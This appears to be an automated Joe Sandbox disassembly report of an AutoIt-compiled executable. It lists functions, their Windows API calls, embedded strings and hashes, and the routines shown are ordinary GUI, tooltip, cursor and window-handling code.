__wcsnicmp.LIBCMT ref: 00C66A3E
__wcsnicmp.LIBCMT ref: 00C66A52

Strings

#OnAutoItStartRegister, xrefs: 00C66973
#ce, xrefs: 00C66A4C
#comments-end, xrefs: 00C66A38
#requireadmin, xrefs: 00C6695B
#include, xrefs: 00C669A3
Bad directive syntax error, xrefs: 00C9E31A
Cannot parse #include, xrefs: 00C9E3F0
#comments-start, xrefs: 00C669BB, 00C66A10
#notrayicon, xrefs: 00C66943
#include-once, xrefs: 00C6698B
#cs, xrefs: 00C669CF, 00C66A24
#pragma compile, xrefs: 00C6692B
Unterminated group of comments, xrefs: 00C9E403

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: ee43083dd5e9252b628e22ee3fe8242de8109a8a7c714c5a9641f1e1b0ad8b01
Instruction ID: e6e7937e1d36325a57ee454599a777abbc7ed44bb2456e620f3fd68c030a97dc
Opcode Fuzzy Hash: ee43083dd5e9252b628e22ee3fe8242de8109a8a7c714c5a9641f1e1b0ad8b01
Instruction Fuzzy Hash: 4781F3B0600205BBDF30FB61EC86FBB7768AF15704F044028FD45AA196EB61DB46E2A5

Function 00CEA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00CEA903
SetTextColor.GDI32(?,?), ref: 00CEA907
GetSysColorBrush.USER32(0000000F), ref: 00CEA91D
GetSysColor.USER32(0000000F), ref: 00CEA928
CreateSolidBrush.GDI32(?), ref: 00CEA92D
GetSysColor.USER32(00000011), ref: 00CEA945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CEA953
SelectObject.GDI32(?,00000000), ref: 00CEA964
SetBkColor.GDI32(?,00000000), ref: 00CEA96D
SelectObject.GDI32(?,?), ref: 00CEA97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00CEA999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CEA9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00CEA9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CEA9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CEAA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00CEAA32
DrawFocusRect.USER32(?,?), ref: 00CEAA3D
GetSysColor.USER32(00000011), ref: 00CEAA4B
SetTextColor.GDI32(?,00000000), ref: 00CEAA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CEAA67
SelectObject.GDI32(?,00CEA5FA), ref: 00CEAA7E
DeleteObject.GDI32(?), ref: 00CEAA89
SelectObject.GDI32(?,?), ref: 00CEAA8F
DeleteObject.GDI32(?), ref: 00CEAA94
SetTextColor.GDI32(?,?), ref: 00CEAA9A
SetBkColor.GDI32(?,?), ref: 00CEAAA4

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 276e9a1f2c7526e1a97e4fb5ee81da5c6b1e1138405ac12013b9d23d721ef045
Instruction ID: 6fefcb308e71c87d81bb93635a6e23319edf67304cefc3e6a68943ca3d0e95c9
Opcode Fuzzy Hash: 276e9a1f2c7526e1a97e4fb5ee81da5c6b1e1138405ac12013b9d23d721ef045
Instruction Fuzzy Hash: E7514B71901248FFDB109FA5DC88FAE7BB9EB48320F114229F911AB2A1D7719A41DF90

Function 00CE89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CE8AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CE8AD2
CharNextW.USER32(0000014E), ref: 00CE8B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CE8B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CE8B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CE8B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CE8B86
SetWindowTextW.USER32(?,0000014E), ref: 00CE8BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CE8BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00CE8C1F
_memset.LIBCMT ref: 00CE8C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CE8C8D
_memset.LIBCMT ref: 00CE8CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CE8D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00CE8D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00CE8E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00CE8E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CE8E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CE8EB4
DrawMenuBar.USER32(?), ref: 00CE8EC3
SetWindowTextW.USER32(?,0000014E), ref: 00CE8EEB

Strings

0, xrefs: 00CE8E55

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 2bd4d40fb245d8a499f0aedfd44a4924b89b9ef56997eb5a935aff527c785282
Instruction ID: 405a641b622c1bac48df2d735d65e9876a9be5335c60aacc24a6d0b32e366d41
Opcode Fuzzy Hash: 2bd4d40fb245d8a499f0aedfd44a4924b89b9ef56997eb5a935aff527c785282
Instruction Fuzzy Hash: 5EE17571900298AFDF20DF52CC84EEE7B79EF05710F10815AF929AB190DB749A85DF61

Function 00CE488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00CE49CA
GetDesktopWindow.USER32 ref: 00CE49DF
GetWindowRect.USER32(00000000), ref: 00CE49E6
GetWindowLongW.USER32(?,000000F0), ref: 00CE4A48
DestroyWindow.USER32(?), ref: 00CE4A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CE4A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CE4ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CE4AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00CE4AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CE4B09
IsWindowVisible.USER32(?), ref: 00CE4B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CE4B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CE4B58
GetWindowRect.USER32(?,?), ref: 00CE4B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00CE4B96
GetMonitorInfoW.USER32(00000000,?), ref: 00CE4BB0
CopyRect.USER32(?,?), ref: 00CE4BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00CE4C32

Strings

tooltips_class32, xrefs: 00CE4A96
(, xrefs: 00CE4BA3
0, xrefs: 00CE4975

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 040306c11b61d06ca402f1f23e63c521731d14f0e26b380b18780214465b0758
Instruction ID: 4d9a5dc49c2767e47578d22b4e39608abaf9985836da72e34330ad8fd0d86a7a
Opcode Fuzzy Hash: 040306c11b61d06ca402f1f23e63c521731d14f0e26b380b18780214465b0758
Instruction Fuzzy Hash: 10B18B71604380AFDB18DF65C888B6ABBE8FF88310F00892CF5999B2A1D770ED05CB55

Function 00C627D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C628BC
GetSystemMetrics.USER32(00000007), ref: 00C628C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C628EF
GetSystemMetrics.USER32(00000008), ref: 00C628F7
GetSystemMetrics.USER32(00000004), ref: 00C6291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C62939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C62949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C6297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C62990
GetClientRect.USER32(00000000,000000FF), ref: 00C629AE
GetStockObject.GDI32(00000011), ref: 00C629CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00C629D5

Part of subcall function 00C62344: GetCursorPos.USER32(?), ref: 00C62357
Part of subcall function 00C62344: ScreenToClient.USER32(00D257B0,?), ref: 00C62374
Part of subcall function 00C62344: GetAsyncKeyState.USER32(00000001), ref: 00C62399
Part of subcall function 00C62344: GetAsyncKeyState.USER32(00000002), ref: 00C623A7

SetTimer.USER32(00000000,00000000,00000028,00C61256), ref: 00C629FC

Strings

AutoIt v3 GUI, xrefs: 00C62974

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 17de4310406e9dad8f9295b65b4bfa81ad2657dd3097487e003657af32289102
Instruction ID: a1ab4f8fd9c915e725c793c01bd4374f8454ef7eeba3372ce241fb2ad1480e88
Opcode Fuzzy Hash: 17de4310406e9dad8f9295b65b4bfa81ad2657dd3097487e003657af32289102
Instruction Fuzzy Hash: 64B17E71A0064ADFDB24DFA8DC89BAD7BB4FB58310F104229FA15EB290DB749941DB50

Function 00CE3DE2 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00CE3E6F
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CE3F2F

Strings

GETSELECTED, xrefs: 00CE405D
ISSELECTED, xrefs: 00CE3F3A
SELECTCLEAR, xrefs: 00CE3FAE
GETSELECTEDCOUNT, xrefs: 00CE3F12
SELECT, xrefs: 00CE3FC9
GETTEXT, xrefs: 00CE3ED8
SELECTINVERT, xrefs: 00CE3FFF
GETITEMCOUNT, xrefs: 00CE3EA1
VIEWCHANGE, xrefs: 00CE40EE
DESELECT, xrefs: 00CE401D
FINDITEM, xrefs: 00CE40A2
GETSUBITEMCOUNT, xrefs: 00CE3EBA
SELECTALL, xrefs: 00CE3F96

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 8379c1e044a04cb1570948941d5620f94ad49a89dc955982c350cdd57c45481b
Instruction ID: 5d12e2b1e63cac797db562f9f774cea0acd7408e677b08a70e4617c68c9969a3
Opcode Fuzzy Hash: 8379c1e044a04cb1570948941d5620f94ad49a89dc955982c350cdd57c45481b
Instruction Fuzzy Hash: 1DA160302143819BCB28EF11C8A6AAEB3E5EF85314F14496CF9665B3D2DB31ED09DB51

Function 00CBA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00CBA47A
__swprintf.LIBCMT ref: 00CBA51B
_wcscmp.LIBCMT ref: 00CBA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00CBA583
_wcscmp.LIBCMT ref: 00CBA5BF
GetClassNameW.USER32(?,?,00000400), ref: 00CBA5F6
GetDlgCtrlID.USER32(?), ref: 00CBA648
GetWindowRect.USER32(?,?), ref: 00CBA67E
GetParent.USER32(?), ref: 00CBA69C
ScreenToClient.USER32(00000000), ref: 00CBA6A3
GetClassNameW.USER32(?,?,00000100), ref: 00CBA71D
_wcscmp.LIBCMT ref: 00CBA731
GetWindowTextW.USER32(?,?,00000400), ref: 00CBA757
_wcscmp.LIBCMT ref: 00CBA76B

Part of subcall function 00C8362C: _iswctype.LIBCMT ref: 00C83634

Strings

%s%u, xrefs: 00CBA515

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: c1a6ae7b0b9c51adde7daa73538e30159b63429cb6bde9196d289666918e799a
Instruction ID: 848f08adc83d439397ebd3b194ada4c5571e642d920c4479f8f0277e5db5e640
Opcode Fuzzy Hash: c1a6ae7b0b9c51adde7daa73538e30159b63429cb6bde9196d289666918e799a
Instruction Fuzzy Hash: CAA1AE71204646AFD714DF64C888BEAB7E8FF44314F008629F9E9D6190DB30EA56CB92

Function 00CBAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00CBAF18
_wcscmp.LIBCMT ref: 00CBAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00CBAF51
CharUpperBuffW.USER32(?,00000000), ref: 00CBAF6E
_wcscmp.LIBCMT ref: 00CBAF8C
_wcsstr.LIBCMT ref: 00CBAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00CBAFD5
_wcscmp.LIBCMT ref: 00CBAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00CBB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00CBB055
_wcscmp.LIBCMT ref: 00CBB065
GetClassNameW.USER32(00000010,?,00000400), ref: 00CBB08D
GetWindowRect.USER32(00000004,?), ref: 00CBB0F6

Strings

@, xrefs: 00CBAEF9
ThumbnailClass, xrefs: 00CBAFE0, 00CBB060

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: b204a037af0a5b73b5ca3c9e1a3a2917ee03731036b5633a6bcb484663ca77ad
Instruction ID: 00a63dfc212e0c70c1c3446459b57fd2efe1f6609478d6af5989722e11a19c43
Opcode Fuzzy Hash: b204a037af0a5b73b5ca3c9e1a3a2917ee03731036b5633a6bcb484663ca77ad
Instruction Fuzzy Hash: 6E81BEB11082459FDB10DF15C885BFA7BE8EF54714F04846AFDA58A0A2DB70DE4ACBA1

Function 00CBABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00CBAC33

Strings

REGEXP=, xrefs: 00CBAC48
ACTIVE, xrefs: 00CBAC0E
[ALL, xrefs: 00CBACD9
[LAST, xrefs: 00CBACE0
HANDLE=, xrefs: 00CBAC2C
[CLASS:, xrefs: 00CBAC83
LAST, xrefs: 00CBABF8
ALL, xrefs: 00CBACC7
[REGEXPTITLE:, xrefs: 00CBAC5B
CLASSNAME=, xrefs: 00CBAC70
[HANDLE:, xrefs: 00CBAC3F
[ACTIVE, xrefs: 00CBAC20

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: c2b5b66cbd743b3b669f0b65b5439d85c42ab0024a5e8b7e888cba01be1d1c18
Instruction ID: 9d1240aa712924b60753d8af6b3a3a210a48f7cc1e1a87b74ccb0bead4be29dd
Opcode Fuzzy Hash: c2b5b66cbd743b3b669f0b65b5439d85c42ab0024a5e8b7e888cba01be1d1c18
Instruction Fuzzy Hash: E531C831A88209BFDB20FA60EE43EEE7774AF10715F200519F495710E1EF626F48E666

Function 00CD4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00CD5013
LoadCursorW.USER32(00000000,00007F00), ref: 00CD501E
LoadCursorW.USER32(00000000,00007F03), ref: 00CD5029
LoadCursorW.USER32(00000000,00007F8B), ref: 00CD5034
LoadCursorW.USER32(00000000,00007F01), ref: 00CD503F
LoadCursorW.USER32(00000000,00007F81), ref: 00CD504A
LoadCursorW.USER32(00000000,00007F88), ref: 00CD5055
LoadCursorW.USER32(00000000,00007F80), ref: 00CD5060
LoadCursorW.USER32(00000000,00007F86), ref: 00CD506B
LoadCursorW.USER32(00000000,00007F83), ref: 00CD5076
LoadCursorW.USER32(00000000,00007F85), ref: 00CD5081
LoadCursorW.USER32(00000000,00007F82), ref: 00CD508C
LoadCursorW.USER32(00000000,00007F84), ref: 00CD5097
LoadCursorW.USER32(00000000,00007F04), ref: 00CD50A2
LoadCursorW.USER32(00000000,00007F02), ref: 00CD50AD
LoadCursorW.USER32(00000000,00007F89), ref: 00CD50B8
GetCursorInfo.USER32(?), ref: 00CD50C8

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: c40a831319f083d75a3231759b55f21ccc2b76073818c0b4f27229efa2913506
Instruction ID: a8ecfe7cf5b008a1ad8a9f9a8a35c58e9ae06576403db460dc2facd96a018423
Opcode Fuzzy Hash: c40a831319f083d75a3231759b55f21ccc2b76073818c0b4f27229efa2913506
Instruction Fuzzy Hash: 4C3105B1D483196ADF109FB68C8995FBFE8FF04750F50452BA51DE7280DA79A5008F91

Function 00CEA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CEA259
DestroyWindow.USER32(?,?), ref: 00CEA2D3

Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CEA34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CEA36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CEA382
DestroyWindow.USER32(00000000), ref: 00CEA3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C60000,00000000), ref: 00CEA3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CEA3F4
GetDesktopWindow.USER32 ref: 00CEA40D
GetWindowRect.USER32(00000000), ref: 00CEA414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CEA42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CEA444

Part of subcall function 00C625DB: GetWindowLongW.USER32(?,000000EB), ref: 00C625EC

Strings

tooltips_class32, xrefs: 00CEA346, 00CEA3D4
0, xrefs: 00CEA26F

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: e9652c80f400b2a14dd46933e0e5d0f2c45cbf7b6c1c276726ac51180fac60fd
Instruction ID: cec8de75f3875046bbbcfb7275f0c7c610aef1204541dfdaf44d89cd6656c76a
Opcode Fuzzy Hash: e9652c80f400b2a14dd46933e0e5d0f2c45cbf7b6c1c276726ac51180fac60fd
Instruction Fuzzy Hash: AE718A70140285AFD721CF29DC49F6A7BE9FB88304F04452DF995DB2A0D7B4EA06CB62

Function 00CEC5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623

DragQueryPoint.SHELL32(?,?), ref: 00CEC627

Part of subcall function 00CEAB37: ClientToScreen.USER32(?,?), ref: 00CEAB60
Part of subcall function 00CEAB37: GetWindowRect.USER32(?,?), ref: 00CEABD6
Part of subcall function 00CEAB37: PtInRect.USER32(?,?,00CEC014), ref: 00CEABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00CEC690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CEC69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CEC6BE
_wcscat.LIBCMT ref: 00CEC6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CEC705
SendMessageW.USER32(?,000000B0,?,?), ref: 00CEC71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00CEC735
SendMessageW.USER32(?,000000B1,?,?), ref: 00CEC757
DragFinish.SHELL32(?), ref: 00CEC75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CEC851

Strings

@GUI_DROPID, xrefs: 00CEC77E
@GUI_DRAGID, xrefs: 00CEC7C9
@GUI_DRAGFILE, xrefs: 00CEC800

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

